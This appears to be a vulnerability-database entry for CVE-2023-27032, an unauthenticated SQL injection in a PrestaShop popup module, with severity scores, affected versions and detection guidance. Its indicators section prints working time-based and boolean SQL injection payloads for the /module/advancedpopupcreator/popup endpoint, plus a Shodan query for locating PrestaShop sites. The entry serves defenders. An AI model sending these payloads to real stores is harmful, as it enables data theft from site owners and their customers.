cbcvebase.
CVE-2023-27032
published 2023-04-12

CVE-2023-27032: Prestashop advancedpopupcreator v1.1.21 to v1.1.24 was discovered to contain a SQL injection vulnerability via the component AdvancedPopup::getPopups().

PriorityP276critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
3.04%
85.9th percentile
Prestashop advancedpopupcreator v1.1.21 to v1.1.24 was discovered to contain a SQL injection vulnerability via the component AdvancedPopup::getPopups().

Affected

1 ranges
VendorProductVersion rangeFixed in
idnovatepopup_module_and_newsletter>= 1.1.21 < 1.1.251.1.25

Detection & IOCsextracted from sources · hover to see the quote

url/module/advancedpopupcreator/popup
commandavailablePopups=if(now()=sysdate()%2Csleep(6)%2C0)&event=1&fromController=product&getPopup=1&id_category=0&id_manufacturer=0&id_product=1&id_supplier=0&referrer=&responsiveWidth=1280&time={{time}}&token={{token}}
commandfromController=(select(0)from(select(sleep(6)))v)/*'%2B(select(0)from(select(sleep(6)))v)%2B'"%2B(select(0)from(select(sleep(6)))v)%2B"*/&id_category=0&id_cms=1&id_manufacturer=0&id_product=0&id_supplier=0&referrer=1&responsiveWidth=1280&time={{time}}&token={{token}}&updateVisits=1&url=https%253A%252F%252F{{Hostname}}%252F
commandavailablePopups=-8514)%20OR%206158%3d6158--%20eKWg&event=1&fromController=product&getPopup=1&id_category=0&id_manufacturer=0&id_product=1&id_supplier=0&referrer=&responsiveWidth=1280&time={{time}}&token={{token}}
commandavailablePopups=-8514)%20OR%206158%3d6157--%20eKWg&event=1&fromController=product&getPopup=1&id_category=0&id_manufacturer=0&id_product=1&id_supplier=0&referrer=&responsiveWidth=1280&time={{time}}&token={{token}}
  • Monitor POST requests to /module/advancedpopupcreator/popup for SQL injection payloads in the `availablePopups` and `fromController` parameters, particularly time-based sleep() injections and boolean-based OR conditions.
  • Time-based SQLi detection: response duration >= 6 seconds combined with HTTP 200 and body containing 'hasError' indicates successful sleep() injection via `availablePopups` or `fromController` parameters.
  • Blind boolean-based SQLi detection: a response containing 'selector' for the true condition payload (-8514) OR 6158=6158) and absence of 'selector' for the false condition payload (-8514) OR 6158=6157) confirms exploitation.
  • Shodan fingerprinting query for exposed PrestaShop instances potentially running the vulnerable module: http.component:"prestashop"
  • The vulnerable code path is AdvancedPopup::getPopups() — look for unsanitized input flowing into SQL queries from that method in module source code audits.
  • Affected versions are advancedpopupcreator v1.1.21 through v1.1.24; presence of these versions on a PrestaShop instance should be treated as a high-priority finding.
  • ·Exploitation requires no authentication — the SQL injection endpoint /module/advancedpopupcreator/popup is accessible to unauthenticated guests, maximising exposure.
  • ·The Nuclei template uses a two-stage flow: first extracting a `time` value and `static_token` from the homepage (GET /), then injecting into the popup endpoint. Detection rules must account for this token-extraction pre-step when replaying or blocking.
  • ·The template covers both time-based (sleep(6)) and blind boolean-based injection techniques; WAF/IDS rules should cover both variants to avoid partial detection gaps.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.